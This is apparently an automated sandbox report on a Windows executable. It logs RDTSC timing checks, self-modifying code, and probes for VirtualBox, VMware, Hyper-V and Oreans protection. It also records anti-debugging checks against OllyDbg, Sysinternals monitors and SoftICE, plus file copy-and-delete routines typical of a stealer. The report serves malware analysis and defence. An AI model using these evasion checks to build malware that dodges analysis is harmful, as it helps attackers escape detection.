Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1198783 second address: 11987B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Ch 0x00000007 jbe 00007F43F0D0DC7Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jl 00007F43F0D0DC66h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119CBFB second address: 119CC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119CC01 second address: 119CC27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43F0D0DC72h 0x0000000f jmp 00007F43F0D0DC6Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119CC27 second address: 119CC2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C0AD second address: 119C0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C0B3 second address: 119C0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C526 second address: 119C52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C65B second address: 119C65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C65F second address: 119C68D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a js 00007F43F0D0DC88h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43F0D0DC74h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C7B8 second address: 119C7BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119C941 second address: 119C94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F43F0D0DC66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A1A4E second address: 11A1A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A4A7E second address: 11A4AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC6Eh 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F43F0D0DC74h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4AA8 second address: 11A4AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB0EB second address: 11AB0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F43F0D0DC66h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB527 second address: 11AB52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB7F6 second address: 11AB7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB7FA second address: 11AB804 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43F0D10386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB804 second address: 11AB80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB80A second address: 11AB833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43F0D10392h 0x00000008 jmp 00007F43F0D10392h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB833 second address: 11AB844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F43F0D0DC6Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABB01 second address: 11ABB11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007F43F0D10386h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABB11 second address: 11ABB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F43F0D0DC66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABC96 second address: 11ABCBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F43F0D1038Bh 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jnl 00007F43F0D10386h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABE38 second address: 11ABE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B280A second address: 11B280E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B280E second address: 11B2822 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43F0D0DC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c jnp 00007F43F0D0DC72h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2822 second address: 11B2828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2828 second address: 11B2839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F43F0D0DC6Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B29BB second address: 11B29D7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43F0D10386h 0x00000008 jmp 00007F43F0D10392h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B29D7 second address: 11B29F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F43F0D0DC74h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F43F0D0DC66h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B29F9 second address: 11B2A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BDFAA second address: 11BDFC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43F0D0DC6Ch 0x00000009 jmp 00007F43F0D0DC6Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3E95 second address: 11C3EAB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43F0D10386h 0x00000008 jne 00007F43F0D10386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CC68E second address: 11CC694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4B2F second address: 11D4B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4B3C second address: 11D4B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4B40 second address: 11D4B4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43F0D10386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D68EE second address: 11D690F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F43F0D0DC76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D690F second address: 11D6913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6913 second address: 11D6917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDE85 second address: 11DDE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E43DF second address: 11E43E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4524 second address: 11E4551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F43F0D10388h 0x0000000c push ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jng 00007F43F0D10386h 0x00000015 pop ebx 0x00000016 popad 0x00000017 jl 00007F43F0D103AAh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jc 00007F43F0D10386h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200EFC second address: 1200F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210E8B second address: 1210E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210E8F second address: 1210E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210E93 second address: 1210E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210E9D second address: 1210EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210EA1 second address: 1210EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210EA5 second address: 1210EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC76h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121117F second address: 1211185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121185B second address: 1211893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F43F0D0DC79h 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211893 second address: 12118A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F43F0D10388h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12118A1 second address: 12118AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43F0D0DC66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12118AB second address: 12118DC instructions: 0x00000000 rdtsc 0x00000002 je 00007F43F0D10386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43F0D10391h 0x00000013 jmp 00007F43F0D10392h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214BBE second address: 1214BCD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43F0D0DC6Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214BCD second address: 1214BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12174C9 second address: 12174CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12174CE second address: 12174D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F43F0D10386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12177BB second address: 12177C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12177C1 second address: 12177C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1217A6B second address: 1217A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121918D second address: 12191CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007F43F0D10386h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F43F0D10393h 0x00000018 jmp 00007F43F0D10399h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12191CC second address: 12191D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B0F1 second address: 121B0F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B0F5 second address: 121B0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10300 second address: 4F10318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43F0D10394h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10318 second address: 4F1033E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43F0D0DC70h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1033E second address: 4F1034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1034D second address: 4F10353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10353 second address: 4F10357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10357 second address: 4F10368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, ECC5h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10368 second address: 4F1036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1036E second address: 4F10398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F43F0D0DC6Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1138615 second address: 113861B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F91B3C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F91A3E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 113E97C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00D438B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00D44910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00D3DA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00D3E430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00D44570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00D3ED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00D316D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00D3F6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00D43EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00D3BE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00D3DE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D31160 GetSystemInfo,ExitProcess, 0_2_00D31160
                Source: file.exe, file.exe, 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1712532051.0000000000B22000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.1712532051.0000000000B5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1712532051.0000000000B55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13306
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13252
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13255
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13274
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13266
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
